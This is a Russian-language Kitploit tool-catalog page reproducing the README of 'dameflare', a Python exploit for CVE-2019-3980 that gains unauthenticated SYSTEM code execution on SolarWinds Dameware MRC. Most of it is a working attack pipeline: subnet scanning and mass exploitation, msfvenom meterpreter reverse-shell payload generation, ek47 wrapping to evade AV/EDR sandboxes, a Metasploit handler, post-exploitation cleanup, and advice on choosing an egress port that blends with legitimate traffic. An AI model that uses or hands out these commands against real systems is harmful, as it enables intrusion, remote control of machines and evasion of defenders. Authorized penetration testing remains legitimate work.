Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
dameflare — Эксплойт на Python 3 для CVE-2019-3980. Неаутентифицированное RCE с правами SYSTEM через обход аутентификации смарт-карты SolarWinds Dameware MRC. | Kitploit
Инструменты/GitHubGitHub/boydhacks/dameflare
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияОбход IDS/IPSТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаГенерация Шеллкода
GitHubboydhacks/dameflare

dameflare

Эксплойт на Python 3 для CVE-2019-3980. Неаутентифицированное RCE с правами SYSTEM через обход аутентификации смарт-карты SolarWinds Dameware MRC.

315 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

DameFlare

DameFlare

Python CVE CVSS Platform

Неаутентифицированное удалённое выполнение кода через обход аутентификации смарт-карты в SolarWinds Dameware MRC

CVE-2019-3980 | CVSS 9.8 Критический | TCP/6129
Оригинальное исследование и POC: Tenable, Inc. (TRA-2019-43)
Инструмент на Python 3: David Boyd (@Fir3d0g)


Как это работает

Dameware MRC предоставляет службу удалённого управления (DWRCS.exe) на порту TCP/6129. Во время рукопожатия аутентификации смарт-карты сервер принимает предоставленный атакующим файл в качестве установщика драйвера смарт-карты (dwDrvInst.exe) и выполняет его от имени SYSTEM без какой-либо аутентификации.

DameFlare реализует полное протокольное рукопожатие (согласование версии → вывод ключа AES → обмен ключами Диффи-Хеллмана → подпись RSA → загрузка драйвера) для доставки произвольной нагрузки и достижения неаутентифицированного удалённого выполнения кода.


Затронутые версии

ПродуктУязвимыеИсправленные
Dameware MRC 12.0.xВсе сборкиHotfix 1
Dameware MRC 12.1.xВсе сборкиHotfix 3

Установка

root@kitploit:~
git clone https://github.com/boydhacks/dameflare
cd dameflare
pip3 install -r requirements.txt
python3 dameflare.py -h

Использование

Одиночная цель

root@kitploit:~
python3 dameflare.py -t 192.168.1.50 -e payload.exe
python3 dameflare.py -t 192.168.1.50 -e payload.exe -v
python3 dameflare.py -t 10.0.0.100 -e payload.exe -p 6130 -T 15

Несколько целей

root@kitploit:~
python3 dameflare.py -f vuln_hosts.txt -e payload.exe
python3 dameflare.py -f vuln_hosts.txt -e payload.exe --threads 5

Режим сканирования

root@kitploit:~
python3 dameflare.py --scan -t 192.168.1.0/24
python3 dameflare.py --scan -t 192.168.1.0/24 -o vuln_hosts.txt --scan-threads 50
python3 dameflare.py --scan -f port6129.txt -o vuln_hosts.txt

Конвейер сканирования + эксплуатации

root@kitploit:~
python3 dameflare.py --scan -t 192.168.1.0/24 -o vuln_hosts.txt
python3 dameflare.py -f vuln_hosts.txt -e payload.exe --threads 5

Очистка

Удаление артефакта dwDrvInst.exe с цели после эксплуатации:

root@kitploit:~
python3 dameflare.py -t 192.168.1.50 --cleanup
python3 dameflare.py -f vuln_hosts.txt --cleanup

Требуется msfvenom в PATH. Загружает самоудаляющийся EXE, который удаляет dwDrvInst.exe и сам себя после короткой задержки.

В качестве альтернативы, при наличии учётных данных, можно использовать что-то вроде NXC:

root@kitploit:~
nxc smb <target> -u <user> -p <pass> -x "del /f /q C:\Windows\Temp\dwDrvInst.exe"

Пример генерации нагрузки (сначала оберните её с помощью ek47)

Сырой шеллкод

root@kitploit:~
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<ip> LPORT=443 EXITFUNC=thread -f raw -o payload.bin

32-битный EXE

root@kitploit:~
msfvenom -p windows/meterpreter_reverse_https LHOST=<ip> LPORT=443 EXITFUNC=thread -f exe -o payload_x86.exe

64-битный EXE

root@kitploit:~
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<ip> LPORT=443 EXITFUNC=thread -f exe -o payload_x64.exe

Обход антивирусов (ek47)

Оберните сырой шеллкод с помощью экологической привязки, чтобы обойти анализ в песочнице AV/EDR. Нагрузка будет расшифрована и выполнена только на машине, где ключи совпадают. Огромная благодарность Kevin Clark (@GuhnooPlusLinux) за его отличную работу!

https://gitlab.com/KevinJClark/ek47

root@kitploit:~
# Key on domain and hostname (use short names, not FQDN)
python3 ek47.py srdi-shellcode -p payload.bin -d <SHORT_DOMAIN> -c <HOSTNAME> -o payload_wrapped.exe

# Key on domain only
python3 ek47.py srdi-shellcode -p payload.bin -d <SHORT_DOMAIN> -o payload_wrapped.exe

# Static key only (useful for testing)
python3 ek47.py srdi-shellcode -p payload.bin -s 5 -o payload_wrapped.exe

# Alternative injection methods if srdi-shellcode is caught
python3 ek47.py dinvoke-shellcode -p payload.bin -d <SHORT_DOMAIN> -c <HOSTNAME> -o payload_wrapped.exe
python3 ek47.py noapi-shellcode   -p payload.bin -d <SHORT_DOMAIN> -c <HOSTNAME> -o payload_wrapped.exe

Полный конвейер (пример)

root@kitploit:~
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<ip> LPORT=6129 EXITFUNC=thread -f raw -o payload.bin
python3 ek47.py srdi-shellcode -p payload.bin -d CONTOSO -c WS01 -o payload_wrapped.exe
python3 dameflare.py -t <target> -e payload_wrapped.exe

Обработчик Metasploit

root@kitploit:~
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_https; set LHOST <ip>; set LPORT 443; set ExitOnSession false; set StagerVerifySSLCert false; set EXITFUNC thread; exploit -j"

Примечание: Имя нагрузки должно точно совпадать между msfvenom и обработчиком:

  • Безстейджевая: windows/x64/meterpreter_reverse_https (подчёркивание)
  • Стейджевая: windows/x64/meterpreter/reverse_https (слеш)

Совет: В средах Dameware порт 6129 часто разрешён для исходящего трафика и смешивается с легитимным трафиком DWRCS. Если порт 443 заблокирован или проверяется прокси, попробуйте LPORT=6129, так как целевая сеть, скорее всего, спроектирована так, чтобы его разрешать.


Отказ от ответственности

Этот инструмент предназначен для использования только в процессе авторизованного тестирования на проникновение и операций красных команд. Автор не несёт ответственности за несанкционированное или противоправное использование.

Скачать инструмент